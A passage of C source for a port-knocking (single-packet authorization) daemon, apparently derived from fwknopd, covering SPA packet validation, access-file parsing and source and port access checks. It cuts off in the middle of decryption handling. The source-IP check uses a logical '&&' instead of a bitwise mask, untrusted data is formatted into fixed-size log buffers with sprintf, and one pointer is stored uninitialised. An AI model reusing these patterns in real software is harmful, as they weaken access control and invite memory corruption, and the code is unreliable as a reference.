        case FW_RULE_UNKNOWN_ERROR:
            return("Unknown/unclassified firewall rule processing error");
    }

    return("Undefined/unknown fwknopd Error");
}
//
/* Basic directory checks (stat() and whether the path is actually
 * a directory).
*/
int
is_valid_dir_inviz(const char *path) {
    struct stat     st;
    //
    /* If we are unable to stat the given dir, then return with error.
    */
    if(stat(path, &st) != 0) {
        return(0);
    }

    if(!S_ISDIR(st.st_mode)) {
        return(0);
    }

    return(1);
}
//
/* Validate and in some cases preprocess/reformat the SPA data.  Return an
 * error code value if there is any indication the data is not valid spa data.
*/
static int
preprocess_spa_data_inviz(char *src_ip) {
    struct spa_pkt_info * spa_pkt;
    spa_pkt = get_spapacketstruct();

    char    *ndx = (char *)&(spa_pkt->packet_data);
    int      pkt_data_len = spa_pkt->packet_data_len;
    int      i;
    char logmsg[512];
    //
    /* At this point, we can reset the packet data length to 0.  This our
     * indicator to the rest of the program that we do not have a current
     * spa packet to process (after this one that is).
    */
    spa_pkt->packet_data_len = 0;
    //
    /* Expect the data to be at least the minimum required size.
    */
    if (get_pkdigest() == FKO_DIGEST_UNKNOWN) {
        //
        // no default digest/hash and none specified
        //
        set_pkmindatalen(0);
    }
    if(get_pkmindatalen() && (pkt_data_len < get_pkmindatalen())) {
        return(SPA_MSG_LEN_TOO_SMALL);
    }
    //
    /* Detect and parse out SPA data from an HTTP reqest. If the SPA data
     * starts with "GET /" and the user agent starts with "Fwknop", then
     * assume it is a SPA over HTTP request.
    */
    if(strncasecmp(ndx, "GET /", 5) == 0
      && strstr(ndx, "User-Agent: Fwknop") != NULL) {
        //
        /* This looks like an HTTP request, so let's see if we are
         * configured to accept such request and if so, find the SPA
         * data.
        */
        if(!get_allowspaoverhttp()) {
            sprintf(logmsg, "HTTP request from %s detected, but not enabled/allowed (with %s)",
                    src_ip, (char *)get_allowspaoverhttpparm());
            logit(_LOG_WARNING, logmsg, 0);
            return(SPA_MSG_HTTP_NOT_ENABLED);
        }
        //
        /* Now extract, adjust (convert characters translated by the fwknop
         * client), and reset the SPA message itself.
        */
        strlcpy((char *)spa_pkt->packet_data, ndx+5, pkt_data_len);

        for(i=0; i<pkt_data_len; i++) {
            if(isspace(*ndx)) {
                /* The first space marks the end of the req(uest) */
                *ndx = '\0';
                break;
            } else if(*ndx == '-') {
                /* Convert '-' to '+' */
                *ndx = '+';
            } else if(*ndx == '_') {
                /* Convert '_' to '/' */
                *ndx = '/';
            } else if(!(isalnum(*ndx) || *ndx == '/' || *ndx == '+' || *ndx == '=')) {
                /* Make sure it is a valid base64 char. */
                return(SPA_MSG_NOT_SPA_DATA);
            }
            ndx++;
        }
    } else {
        /* Make sure the data is valid Base64-encoded characters
        * (at least the first MIN_SPA_DATA_SIZE bytes).
        */
        ndx = (char *)spa_pkt->packet_data;
        int imin;
        if (get_pkmindatalen()) {
            imin = get_pkmindatalen();
        } else {
            imin = (pkt_data_len - 1);
        }
        for(i=0; i<imin; i++) {
            if(!(isalnum(*ndx) || *ndx == '/' || *ndx == '+' || *ndx == '=')) {
                return(SPA_MSG_NOT_SPA_DATA);
            }
            ndx++;
        }
    }

    /* --DSS:  Are there other checks we can do here ??? */

    /* If we made it here, we have no reason to assume this is not SPA data
     * (at least until we come up with more checks).
    */
    return(FKO_SUCCESS);
}
//
/* Populate a spa_data struct from an initialized (and populated) FKO context.
*/
static int
get_spa_data_fields_inviz(fko_ctx_t ctx, spa_data_t *spdat) {
    int res = FKO_SUCCESS;

    res = fko_get_username(ctx, &(spdat->username));
    if(res != FKO_SUCCESS)
        return(res);

    res = fko_get_timestamp(ctx, &(spdat->timestamp));
    if(res != FKO_SUCCESS)
        return(res);

    res = fko_get_version(ctx, &(spdat->version));
    if(res != FKO_SUCCESS)
        return(res);

    res = fko_get_spa_message_type(ctx, &(spdat->message_type));
    if(res != FKO_SUCCESS)
        return(res);

    res = fko_get_spa_message(ctx, &(spdat->spa_message));
    if(res != FKO_SUCCESS)
        return(res);

    res = fko_get_spa_nat_access(ctx, &(spdat->nat_access));
    if(res != FKO_SUCCESS)
        return(res);

    res = fko_get_spa_server_auth(ctx, &(spdat->server_auth));
    if(res != FKO_SUCCESS)
        return(res);

    res = fko_get_spa_client_timeout(ctx, (int *)&(spdat->client_timeout));
    if(res != FKO_SUCCESS)
        return(res);

    return(res);
}
//
/* Add an access string entry
*/
void
add_acc_string_inviz(char **var, char *val) {
    char logmsg[512];
    if((*var = strdup(val)) == NULL) {
        sprintf(logmsg, "Fatal memory allocation error adding access list entry: %s", (char *)var);
        logit(_LOG_ERROR, logmsg, 0);
        exit(EXIT_FAILURE);
    }
}
//
/* Add an access int entry
*/
static int
add_acc_int_inviz(int *var, char *val) {
    return(*var = atoi(val));
}
//
/* Add an access bool entry (unsigned char of 1 or 0)
*/
static unsigned char
add_acc_bool_inviz(unsigned char *var, char *val) {
    return(*var = (strncasecmp(val, "Y", 1) == 0) ? 1 : 0);
}
//
/* Take an IP or Subnet/Mask and convert it to mask for later
 * comparisons of incoming source IPs against this mask.
*/
static void
add_source_mask_inviz(acc_stanza_t *acc, char *ip) {
    char                *ndx;
    char                ip_str[16] = {0};
    uint32_t            mask;
    char                logmsg[512];
    struct in_addr      in;

    acc_int_list_t      *last_sle, *new_sle, *tmp_sle;

    if((new_sle = calloc(1, sizeof(acc_int_list_t))) == NULL) {
        logit(_LOG_ERROR, "Fatal memory allocation error adding stanza source_list entry", 0);
        exit(EXIT_FAILURE);
    }

    /* If this is not the first entry, we walk our pointer to the
     * end of the list.
    */
    if(acc->source_list == NULL) {
        acc->source_list = new_sle;
    } else {
        tmp_sle = acc->source_list;

        do {
            last_sle = tmp_sle;
        } while((tmp_sle = tmp_sle->next));

        last_sle->next = new_sle;
    }

    /* Convert the IP data into the appropriate mask
    */
    if(strcasecmp(ip, "ANY") == 0) {
        new_sle->maddr = 0x0;
        new_sle->mask = 0x0;
    } else {
        /* See if we have a subnet component.  If so pull out the IP and
         * mask values, then create the final mask value.
        */
        if((ndx = strchr(ip, '/')) != NULL) {
            mask = atoi(ndx+1);
            strlcpy(ip_str, ip, (ndx-ip)+1);
        } else {
            mask = 32;
            strlcpy(ip_str, ip, strlen(ip)+1);
        }

        if(inet_aton(ip_str, &in) == 0) {
            sprintf(logmsg, "unable to parse IP to int for: %s", ip_str);
            logit(_LOG_ERROR, logmsg, 0);

            free(new_sle);
            new_sle = NULL;

            return;
        }

        /* Store our mask converted from CIDR to a 32-bit value.
        */
        new_sle->mask  = (0xFFFFFFFF << (32 - mask));

        /* Store our masked address for cpmarisons with future incoming
         * packets.
        */
        new_sle->maddr = ntohl(in.s_addr) & new_sle->mask;
    }
}
//
/* Expand the access SOURCE string to a list of masks.
*/
void
expand_acc_source_inviz(acc_stanza_t *acc) {
    char           *ndx, *start;
    char            buf[32];

    start = acc->source;

    for(ndx = start; *ndx; ndx++) {
        if(*ndx == ',') {
            /* Skip over any leading whitespace.
            */
            while(isspace(*start)) {
                start++;
            }

            strlcpy(buf, start, (ndx-start)+1);
            add_source_mask_inviz(acc, buf);
            start = ndx+1;
        }
    }

    /* Skip over any leading whitespace (once again for the last in the list).
    */
    while(isspace(*start)) {
        start++;
    }

    strlcpy(buf, start, (ndx-start)+1);
    add_source_mask_inviz(acc, buf);
}
//
//
//
static int
parse_proto_and_port_inviz(char *pstr, int *proto, int *port) {
    char    *ndx;
    char    proto_str[32];
    char    logmsg[512];

    /* Parse the string into its components.
    */
    if((ndx = strchr(pstr, '/')) == NULL) {
        sprintf(logmsg, "Parse error on access port entry: %s", pstr);
        logit(_LOG_ERROR, logmsg, 0);

        return(-1);
    }

    strlcpy(proto_str, pstr,  (ndx - pstr)+1);

    *port = atoi(ndx+1);

    if(strcasecmp(proto_str, IPPROTO_TCP_DESC) == 0) {
        *proto = IPPROTO_TCP;
    } else if(strcasecmp(proto_str, IPPROTO_UDP_DESC) == 0) {
        *proto = IPPROTO_UDP;
    } else {
        sprintf(logmsg, "Invalid protocol in access port entry: %s", pstr);
        logit(_LOG_ERROR, logmsg, 0);
        return(-1);
    }

    return(0);
}
//
/* Take a proto/port string and convert it to appropriate integer values
 * for comparisons of incoming SPA requests.
*/
static void
add_port_list_ent_inviz(acc_port_list_t **plist, char *port_str) {
    int                 proto_int, port;

    acc_port_list_t     *last_plist, *new_plist, *tmp_plist;

    /* Parse the string into its components and continue only if there
     * are no problems with the incoming string.
    */
    if(parse_proto_and_port_inviz(port_str, &proto_int, &port) != 0) {
        return;
    }

    if((new_plist = calloc(1, sizeof(acc_port_list_t))) == NULL) {
        logit(_LOG_ERROR, "Fatal memory allocation error adding stanza source_list entry", 0);
        exit(EXIT_FAILURE);
    }

    /* If this is not the first entry, we walk our pointer to the
     * end of the list.
    */
    if(*plist == NULL) {
        *plist = new_plist;
    } else {
        tmp_plist = *plist;

        do {
            last_plist = tmp_plist;
        } while((tmp_plist = tmp_plist->next));

        last_plist->next = new_plist;
    }

    new_plist->proto = proto_int;
    new_plist->port  = port;
}
//
/* Add a string list entry to the given acc_string_list.
*/
static void
add_string_list_ent_inviz(acc_string_list_t **stlist, char *str_str) {
    acc_string_list_t   *last_stlist, *new_stlist, *tmp_stlist;

    if((new_stlist = calloc(1, sizeof(acc_string_list_t))) == NULL) {
        logit(_LOG_ERROR, "Fatal memory allocation error creating string list entry", 0);
        exit(EXIT_FAILURE);
    }

    /* If this is not the first entry, we walk our pointer to the
     * end of the list.
    */
    if(*stlist == NULL) {
        *stlist = new_stlist;
    } else {
        tmp_stlist = *stlist;

        do {
            last_stlist = tmp_stlist;
        } while((tmp_stlist = tmp_stlist->next));

        last_stlist->next = new_stlist;
    }

    new_stlist->str = strdup(str_str);

    if(new_stlist->str == NULL) {
        logit(_LOG_ERROR, "Fatal memory allocation error adding string list entry item", 0);
        exit(EXIT_FAILURE);
    }

}
//
/* Expand a proto/port access string to a list of access proto-port struct.
*/
void
expand_acc_port_list_inviz(acc_port_list_t **plist, char *plist_str) {
    char           *ndx, *start;
    char            buf[32];

    start = plist_str;

    for(ndx = start; *ndx; ndx++) {
        if(*ndx == ',') {
            /* Skip over any leading whitespace.
            */
            while(isspace(*start)) {
                start++;
            }
            strlcpy(buf, start, (ndx-start)+1);
            add_port_list_ent_inviz(plist, buf);
            start = ndx+1;
        }
    }

    /* Skip over any leading whitespace (once again for the last in the list).
    */
    while(isspace(*start)) {
        start++;
    }
    strlcpy(buf, start, (ndx-start)+1);

    add_port_list_ent_inviz(plist, buf);
}
//
/* Expand a comma-separated string into a simple acc_string_list.
*/
static void
expand_acc_string_list_inviz(acc_string_list_t **stlist, char *stlist_str) {
    char           *ndx, *start;
    char            buf[1024];

    //int             stlen = strlen(stlist_str);

    start = stlist_str;

    for(ndx = start; *ndx; ndx++) {
        if(*ndx == ',') {
            /* Skip over any leading whitespace.
            */
            while(isspace(*start)) {
                start++;
            }
            strlcpy(buf, start, (ndx-start)+1);
            add_string_list_ent_inviz(stlist, buf);
            start = ndx+1;
        }
    }

    /* Skip over any leading whitespace (once again for the last in the list).
    */
    while(isspace(*start)) {
        start++;
    }
    strlcpy(buf, start, (ndx-start)+1);

    add_string_list_ent_inviz(stlist, buf);
}
//
/* Free the acc source_list
*/
static void
free_acc_source_list_inviz(acc_int_list_t *sle) {
    acc_int_list_t    *last_sle;

    while(sle != NULL) {
        last_sle = sle;
        sle = last_sle->next;

        free(last_sle);
    }
}
//
/* Free a port_list
*/
void
free_acc_port_list_inviz(acc_port_list_t *ple) {
    acc_port_list_t    *last_ple;

    while(ple != NULL) {
        last_ple = ple;
        ple = last_ple->next;

        free(last_ple);
    }
}
//
/* Free a string_list
*/
static void
free_acc_string_list_inviz(acc_string_list_t *stl) {
    acc_string_list_t    *last_stl;

    while(stl != NULL) {
        last_stl = stl;
        stl = last_stl->next;

        free(last_stl);
    }
}
//
/* Free any allocated content of an access stanza.
 *
 * NOTE: If a new access.conf parameter is created, and it is a string
 *       value, it also needs to be added to the list if items to check
 *       and free below.
*/
static void
free_acc_stanza_data_inviz(acc_stanza_t *acc) {
    if(acc->source != NULL) {
        free(acc->source);
        free_acc_source_list_inviz(acc->source_list);
    }

    if(acc->open_ports != NULL) {
        free(acc->open_ports);
        free_acc_port_list_inviz(acc->oport_list);
    }

    if(acc->restrict_ports != NULL) {
        free(acc->restrict_ports);
        free_acc_port_list_inviz(acc->rport_list);
    }

    if(acc->key != NULL)
        free(acc->key);

    if(acc->cmd_exec_user != NULL)
        free(acc->cmd_exec_user);

    if(acc->gpg_home_dir != NULL)
        free(acc->gpg_home_dir);

    if(acc->gpg_decrypt_id != NULL)
        free(acc->gpg_decrypt_id);

    if(acc->gpg_decrypt_pw != NULL)
        free(acc->gpg_decrypt_pw);

    if(acc->gpg_remote_id != NULL) {
        free(acc->gpg_remote_id);
        free_acc_string_list_inviz(acc->gpg_remote_id_list);
    }
}
//
/* Expand any access entries that may be multi-value.
*/
static void
expand_acc_ent_lists_inviz() {
    struct acc_stanza *acc;
    if (!get_accstanzastruct()) {
        return;
    }
    acc = (struct acc_stanza *)get_accstanzastruct();
    //
    /* We need to do this for each stanza.
    */
    while(acc) {
        //
        /* Expand the source string to 32-bit integer masks foreach entry.
        */
        expand_acc_source_inviz(acc);
        //
        /* Now expand the open_ports string.
        */
        if(acc->open_ports != NULL && strlen(acc->open_ports))
            expand_acc_port_list_inviz(&(acc->oport_list), acc->open_ports);

        if(acc->restrict_ports != NULL && strlen(acc->restrict_ports))
            expand_acc_port_list_inviz(&(acc->rport_list), acc->restrict_ports);

        /* Expand the GPG_REMOTE_ID string.
        */
        if(acc->gpg_remote_id != NULL && strlen(acc->gpg_remote_id))
            expand_acc_string_list_inviz(&(acc->gpg_remote_id_list), acc->gpg_remote_id);

        acc = acc->next;
    }
}
//
/* Take an index and a string value. malloc the space for the value
 * and assign it to the array at the specified index.
*/
static void
acc_stanza_init_inviz() {
    acc_stanza_t    *acc, *last_acc;
    //
    /* Free any resources first (in case of reconfig). Assume non-NULL
     * entry needs to be freed.
    */
    acc = (acc_stanza_t *)get_accstanzastruct();

    while(acc != NULL) {
        last_acc = acc;
        acc = last_acc->next;

        free_acc_stanza_data_inviz(last_acc);
        free(last_acc);
    }
    return;
}
//
/* Add a new stanza bay allocating the required memory at the required
 * location, yada-yada-yada.
*/
static acc_stanza_t*
acc_stanza_add_inviz() {
    acc_stanza_t    *acc     = (acc_stanza_t *)get_accstanzastruct();
    acc_stanza_t    *new_acc = calloc(1, sizeof(acc_stanza_t));
    acc_stanza_t    *last_acc;

    if(new_acc == NULL) {
        logit(_LOG_ERROR, "Fatal memory allocation error adding access stanza", 0);
        exit(EXIT_FAILURE);
    }

    /* If this is not the first acc entry, we walk our acc pointer to the
     * end of the existing list.
    */
    if(acc == NULL) {
        set_accstanzastruct(new_acc);
    } else {
        do {
            last_acc = acc;
        } while((acc = acc->next));

        last_acc->next = new_acc;
    }

    return(new_acc);
}
//
/* Scan the access options for entries that have not been set, but need
 * a default value.
*/
static void
set_acc_defaults_inviz() {
    acc_stanza_t    *acc = (acc_stanza_t *)get_accstanzastruct();

    if(!acc) {
        return;
    }

    while(acc) {
        /* set default fw_access_timeout if necessary
        */
        if(acc->fw_access_timeout < 1) {
            acc->fw_access_timeout = DEF_FW_ACCESS_TIMEOUT;
        }
        /* set default gpg keyring path if necessary
        */
        if( (acc->gpg_decrypt_pw != NULL) && (acc->gpg_home_dir == NULL) ) {
            add_acc_string_inviz(&(acc->gpg_home_dir), (char *)get_gpg_homedir());
        }
        acc = acc->next;
    }
}
//
/* Perform some sanity checks on an acc stanza data.
*/
int
acc_data_is_valid_inviz(acc_stanza_t *acc) {
    char logmsg[512];
    if((acc->key == NULL || !strlen(acc->key))
      && (acc->gpg_decrypt_pw == NULL || !strlen(acc->gpg_decrypt_pw))) {
        sprintf(logmsg, "No keys found for access stanza source (%s)", acc->source);
        logit(_LOG_ERROR, logmsg, 0);
        return(0);
    }

    return(1);
}
//
/* Read and parse the access file, popluating the access data as we go.
*/
void
parse_access_file_inviz() {
    FILE           *file_ptr;
    char           *ndx;
    int             got_source = 0;
    unsigned int    num_lines = 0;

    char            access_line_buf[MAX_LINE_LEN] = {0};
    char            var[MAX_LINE_LEN]  = {0};
    char            val[MAX_LINE_LEN]  = {0};
    char            logmsg[512];

    struct passwd  *pw;
    struct stat     st;

    acc_stanza_t   *curr_acc = NULL;
    //
    /* First see if the access file exists.  If it doesn't, complain
     * and bail.
    */
    if ( !get_pkaccessfilename() || (strlen(get_pkaccessfilename()) == 0) ) {
        set_pkaccessfilename(INVIZ_DEFAULT_SPA_ACCESS_FILENAME, strlen(INVIZ_DEFAULT_SPA_ACCESS_FILENAME));
    }
    if(stat((char *)get_pkaccessfilename(), &st) != 0) {
        sprintf(logmsg, "pk access file (%s) not found", (char *)get_pkaccessfilename());
        logit(_LOG_ERROR, logmsg, 0);
        exit(EXIT_FAILURE);
    }

    if ((file_ptr = fopen((char *)get_pkaccessfilename(), "r")) == NULL) {
        sprintf(logmsg, "unable to open pk access file (%s)", (char *)get_pkaccessfilename());
        logit(_LOG_ERROR, logmsg, 0);
        exit(EXIT_FAILURE);
    }
    //
    /* Initialize the access list.
    */
    acc_stanza_init_inviz();
    //
    /* Now walk through access file pulling the access entries into the
     * current stanza.
    */
    while ((fgets(access_line_buf, MAX_LINE_LEN, file_ptr)) != NULL) {
        num_lines++;
        access_line_buf[MAX_LINE_LEN-1] = '\0';
        //
        /* Get past comments and empty lines (note: we only look at the
         * first character.
        */
        if(IS_EMPTY_LINE(access_line_buf[0])) {
            continue;
        }
        if(sscanf(access_line_buf, "%s %[^;\n\r]", var, val) != 2) {
            sprintf(logmsg, "invalid access file entry in %s at line %i (%s)",
                (char *)get_pkaccessfilename(), num_lines, access_line_buf);
            logit(_LOG_WARNING, logmsg, 0);
            continue;
        }
        //
        /* Remove any colon that may be on the end of the var
        */
        if((ndx = strrchr(var, ':')) != NULL) {
            *ndx = '\0';
        }
        /*
        */
        if(get_verbose() > 3) {
            sprintf(logmsg, "pk access file (%s) line (%s) var (%s) value (%s)",
                (char *)get_pkaccessfilename(), access_line_buf, var, val);
            logit(_LOG_INFO, logmsg, 0);
        }
        //
        /* Process the entry.
         *
         * NOTE: If a new access.conf parameter is created.  It also needs
         *       to be accounted for in the following if/if else construct.
        */
        if(CONF_VAR_IS(var, "SOURCE")) {
            //
            /* If this is not the first stanza, sanity check the previous
             * stanza for the minimum required data.
            */
            if(curr_acc != NULL) {
                if(!acc_data_is_valid_inviz(curr_acc)) {
                    sprintf(logmsg, "data error in access file (%s)",
                        (char *)get_pkaccessfilename());
                    logit(_LOG_ERROR, logmsg, 0);
                    exit(EXIT_FAILURE);
                }
            }
            //
            /* Start new stanza.
            */
            curr_acc = acc_stanza_add_inviz();
            //
            add_acc_string_inviz(&(curr_acc->source), val);
            //
            got_source++;
        } else if (curr_acc == NULL) {
            /* The stanza must start with the "SOURCE" variable
            */
            continue;
        } else if(CONF_VAR_IS(var, "OPEN_PORTS")) {
            add_acc_string_inviz(&(curr_acc->open_ports), val);
        } else if(CONF_VAR_IS(var, "RESTRICT_PORTS")) {
            add_acc_string_inviz(&(curr_acc->restrict_ports), val);
        } else if(CONF_VAR_IS(var, "KEY")) {
            if(strcasecmp(val, "__CHANGEME__") == 0) {
                sprintf(logmsg, "KEY value is not properly set in stanza source (%s) in access file (%s)",
                    curr_acc->source, (char *)get_pkaccessfilename());
                logit(_LOG_ERROR, logmsg, 0);
                exit(EXIT_FAILURE);
            }
            add_acc_string_inviz(&(curr_acc->key), val);
        } else if(CONF_VAR_IS(var, "FW_ACCESS_TIMEOUT")) {
            add_acc_int_inviz(&(curr_acc->fw_access_timeout), val);
        } else if(CONF_VAR_IS(var, "ENABLE_CMD_EXEC")) {
            add_acc_bool_inviz(&(curr_acc->enable_cmd_exec), val);
        } else if(CONF_VAR_IS(var, "CMD_EXEC_USER")) {
            add_acc_string_inviz(&(curr_acc->cmd_exec_user), val);
            errno = 0;
            pw = getpwnam(val);
            if(pw == NULL) {
                sprintf(logmsg, "unable to determine UID for CMD_EXEC_USER (%s)",
                    errno ? strerror(errno) : "Not a user on this system");
                logit(_LOG_ERROR, logmsg, 0);
                exit(EXIT_FAILURE);
            }
            curr_acc->cmd_exec_uid = pw->pw_uid;
        } else if(CONF_VAR_IS(var, "REQUIRE_USERNAME")) {
            add_acc_string_inviz(&(curr_acc->require_username), val);
        } else if(CONF_VAR_IS(var, "REQUIRE_SOURCE_ADDRESS")) {
            add_acc_bool_inviz(&(curr_acc->require_source_address), val);
        } else if(CONF_VAR_IS(var, "GPG_HOME_DIR")) {
            if (is_valid_dir_inviz(val)) {
                add_acc_string_inviz(&(curr_acc->gpg_home_dir), val);
            } else {
                sprintf(logmsg,
                    "GPG_HOME_DIR directory (%s) stat()/existence problem in stanza source (%s) in access file (%s)",
                    val, curr_acc->source, (char *)get_pkaccessfilename());
                logit(_LOG_ERROR, logmsg, 0);
                exit(EXIT_FAILURE);
            }
        } else if(CONF_VAR_IS(var, "GPG_DECRYPT_ID")) {
            add_acc_string_inviz(&(curr_acc->gpg_decrypt_id), val);
        } else if(CONF_VAR_IS(var, "GPG_DECRYPT_PW")) {
            if(strcasecmp(val, "__CHANGEME__") == 0) {
                sprintf(logmsg,
                    "GPG_DECRYPT_PW value is not properly set in stanza source (%s) in access file (%s)",
                    curr_acc->source, (char *)get_pkaccessfilename());
                logit(_LOG_ERROR, logmsg, 0);
                exit(EXIT_FAILURE);
            }
            add_acc_string_inviz(&(curr_acc->gpg_decrypt_pw), val);
        } else if(CONF_VAR_IS(var, "GPG_REQUIRE_SIG")) {
            add_acc_bool_inviz(&(curr_acc->gpg_require_sig), val);
        } else if(CONF_VAR_IS(var, "GPG_IGNORE_SIG_VERIFY_ERROR")) {
            add_acc_bool_inviz(&(curr_acc->gpg_ignore_sig_error), val);
        } else if(CONF_VAR_IS(var, "GPG_REMOTE_ID")) {
            add_acc_string_inviz(&(curr_acc->gpg_remote_id), val);
        } else {
            sprintf(logmsg, "ignoring unknown access parameter (%s) in (%s)",
                var, (char *)get_pkaccessfilename());
            logit(_LOG_ERROR, logmsg, 0);
        }
    }
    fclose(file_ptr);
    //
    /* Basic check to ensure that we got at least one SOURCE stanza with
     * a valid KEY defined (valid meaning it has a value that is not
     * "__CHANGEME__".
    */
    if (got_source == 0) {
        sprintf(logmsg, "could not find valid SOURCE stanza in access file (%s)",
            (char *)get_pkaccessfilename());
        logit(_LOG_ERROR, logmsg, 0);
        exit(EXIT_FAILURE);
    }
    //
    /* Sanity check the last stanza
    */
    if(!acc_data_is_valid_inviz(curr_acc)) {
        sprintf(logmsg, "data error in access file (%s)",
            (char *)get_pkaccessfilename());
        logit(_LOG_ERROR, logmsg, 0);
        exit(EXIT_FAILURE);
    }
    //
    /* Expand our the expandable fields into their respective data buckets.
    */
    expand_acc_ent_lists_inviz();
    //
    /* Make sure default values are set where needed.
     * a default value.
    */
    set_acc_defaults_inviz();
    return;
}
//
/* Check an IP address against the list of allowed SOURCE stanzas.
 * return the a pointer to the access stanza that matches first or
 * NULL if no match is found.
*/
acc_stanza_t*
acc_check_source_inviz(uint32_t ip) {
    acc_stanza_t    *acc = (acc_stanza_t *)get_accstanzastruct();
    if(acc == NULL) {
        if (get_usepkaccessfile()) {
            logit(_LOG_WARNING, "no access stanzas defined", 0);
        }
        return(NULL);
    }
    while(acc) {
        if((ip && acc->source_list->mask) == acc->source_list->maddr) {
            break;
        }
        acc = acc->next;
    }
    return(acc);
}
//
/* Compare the contents of 2 port lists.  Return true on a match.
 * Match depends on the match_any flag.  if match_any is 1 then any
 * entry in the incoming data need only match one item to return true.
 * Otherwise all entries in the incoming data must have a corresponding
 * match in the access port_list.
*/
static int
compare_port_list_inviz(acc_port_list_t *in, acc_port_list_t *ac, int match_any) {
    int a_cnt = 0;
    int i_cnt = 0;
    acc_port_list_t *tlist;
    while(in) {
        i_cnt++;
        tlist = ac;
        while(tlist) {
            if(in->proto == tlist->proto && in->port == tlist->port) {
                a_cnt++;
                if(match_any == 1) {
                    return(1);
                }
            }
            tlist = tlist->next;
        }
        in = in->next;
    }
    return(i_cnt == a_cnt);
}
//
/* Take a proto/port string (or mulitple comma-separated strings) and check
 * them against the list for the given access stanza.
 *
 * Return 1 if we are allowed
*/
int
acc_check_port_access_inviz(acc_stanza_t *acc, char *port_str) {
    int             res     = 1;
    char            buf[32];
    char           *ndx, *start;
    char            logmsg[512];

    acc_port_list_t *o_pl   = acc->oport_list;
    acc_port_list_t *r_pl   = acc->rport_list;

    acc_port_list_t *in_pl  = NULL;

    start = port_str;
    //
    /* Create our own internal port_list from the incoming SPA data
     * for comparison.
    */
    for(ndx = start; *ndx; ndx++) {
        if(*ndx == ',') {
            strlcpy(buf, start, (ndx-start)+1);
            add_port_list_ent_inviz(&in_pl, buf);
            start = ndx+1;
        }
    }
    strlcpy(buf, start, (ndx-start)+1);
    add_port_list_ent_inviz(&in_pl, buf);

    if(in_pl == NULL) {
        sprintf(logmsg, "unable to create acc_port_list from incoming data (%s)", port_str);
        logit(_LOG_ERROR, logmsg, 0);
        return(0);
    }
    //
    /* Start with restricted ports (if any).  Any match (even if only one
     * entry) means not allowed.
    */
    if((acc->rport_list != NULL) && (compare_port_list_inviz(in_pl, r_pl, 1))) {
        res = 0;
        goto cleanup_and_bail;
    }
    //
    /* For open port list, all must match.
    */
    if((acc->oport_list != NULL) && (!compare_port_list_inviz(in_pl, o_pl, 0))) {
        res = 0;
    }
//
cleanup_and_bail:
//
    free_acc_port_list_inviz(in_pl);
    return(res);
}
//
/* Take a GPG ID string and check it against the list of allowed
 * GPG_REMOTE_ID's.
 *
 * Return 1 if we are allowed
*/
int
acc_check_gpg_remote_id_inviz(acc_stanza_t *acc, char *gpg_id) {
    acc_string_list_t *ndx;

    for(ndx = acc->gpg_remote_id_list; ndx != NULL; ndx=ndx->next) {
        if(strcasecmp(ndx->str, gpg_id) == 0) {
            return(1);
        }
    }
    return(0);
}
//
// callback function for inotify
//
void
inotify_io_cb(struct ev_loop *loop, struct ev_io *w, int revents) {
    if (get_verbose()) {
        logit(_LOG_INFO, "inotify io event caught", 0);
    }
    //char buf[EV_INOTIFY_BUFSIZE];
    //int ofs;
    //int len = read (fs_fd, buf, sizeof (buf));
    //
    //for (ofs = 0; ofs < len; ) {
    //  struct inotify_event *ev = (struct inotify_event *)(buf + ofs);
    //  infy_wd (loop, ev->wd, ev->wd, ev);
    //  ofs += sizeof (struct inotify_event) + ev->len;
    //}
}
//
//
//
void
inotify_stat_cb(struct ev_loop *loop, struct ev_stat *w, int revents) {
    if (get_verbose()) {
        logit(_LOG_INFO, "inotify stat event caught", 0);
    }
}
//
/* Process the SPA packet data
 * based on fwknop incoming_spa()
*/
int
process_incoming_pkpacket() {
    //
    /* Always a good idea to initialize ctx to null if it will be used
     * repeatedly (especially when using fko_new_with_data().
    */
    fko_ctx_t       ctx = NULL;

    char            *spa_ip_demark, *gpg_id;
    //time_t          now_ts;
    //int             ts_diff;
    int             res, status, enc_type;
    int             fd, wd;
    char            logmsg[512];
    //
    struct spa_pkt_info *spa_pkt;
    if (!get_spapacketstruct()) {
        set_spapacketstruct((struct spa_pkt_info *)spa_pkt);
    }
    spa_pkt = get_spapacketstruct();
    //
    /* This will hold our pertinent SPA data.
    */
    spa_data_t spadat;
    //
    /* Get the access.conf data for the stanza that matches this incoming
     * source IP address.
    */
    struct acc_stanza *this_access;
    this_access = acc_check_source_inviz(spa_pkt->packet_src_ip);
    set_accstanzastruct((struct acc_stanza *)this_access);
    inet_ntop(AF_INET, &(spa_pkt->packet_src_ip),
        spadat.pkt_source_ip, sizeof(spadat.pkt_source_ip));
    //
    /* At this point, we want to validate and (if needed) preprocess the
     * SPA data and/or to be reasonably sure we have a SPA packet (i.e
     * try to eliminate obvious non-spa packets).
    */
    res = preprocess_spa_data_inviz(spadat.pkt_source_ip);
    if(res != FKO_SUCCESS) {
        return(SPA_MSG_NOT_SPA_DATA);
    }

    if (get_verbose()) {
        sprintf(logmsg, "packet from ip %s received", spadat.pkt_source_ip);
        logit(_LOG_INFO, logmsg, 0);
    }

    if(this_access == NULL) {
        if (get_usepkaccessfile()) {
            sprintf(logmsg, "no access data found for source ip %s", spadat.pkt_source_ip);
            logit(_LOG_WARNING, logmsg, 0);
            return(SPA_MSG_ACCESS_DENIED);
        } else {
            this_access = get_accstanzastruct();
        }
    }

    if(get_verbose() > 1) {
        sprintf(logmsg, "port knocking packet encrypted content: %s", spa_pkt->packet_data);
        logit(_LOG_INFO, logmsg, 0);
    }
    //
    /* Get encryption type and try its decoding routine first (if the key
     * for that type is set)
    */
    enc_type = fko_encryption_type((char *)spa_pkt->packet_data);

    if(enc_type == FKO_ENCRYPTION_RIJNDAEL) {
        while (TRUE) {
            if(this_access->key != NULL) {
                res = fko_new_with_data(&ctx, (char *)spa_pkt->packet_data, this_access->key);
                break;
            } else {
                this_access->key = malloc(INVIZ_MAX_PASSWORD_LEN+1);
                memset(this_access->key, 0, INVIZ_MAX_PASSWORD_LEN+1);
                if (get_pkpassword() && this_access->key) {
                    strncpy(this_access->key, (char *)get_pkpassword(), strlen(get_pkpassword()));
                    continue;
                } else if (this_access->key) {
                    //
                    // if key not previously specified, get from user now
                    //
                    this_access->key = get_user_pw_inviz(CRYPT_OP_DECRYPT);
                    //
                    // and use it
                    //
                    continue;
                } else {
                    logit(_LOG_ERROR, "no key for RIJNDAEL encrypted messages", 0);
                    return(SPA_MSG_FKO_CTX_ERROR);
                }
            }
        }
    } else if(enc_type == FKO_ENCRYPTION_GPG) {
        //
        /* For GPG we create the new context without decrypting on the fly
         * so we can set some  GPG parameters first.
        */
        if(this_access->gpg_decrypt_pw != NULL) {
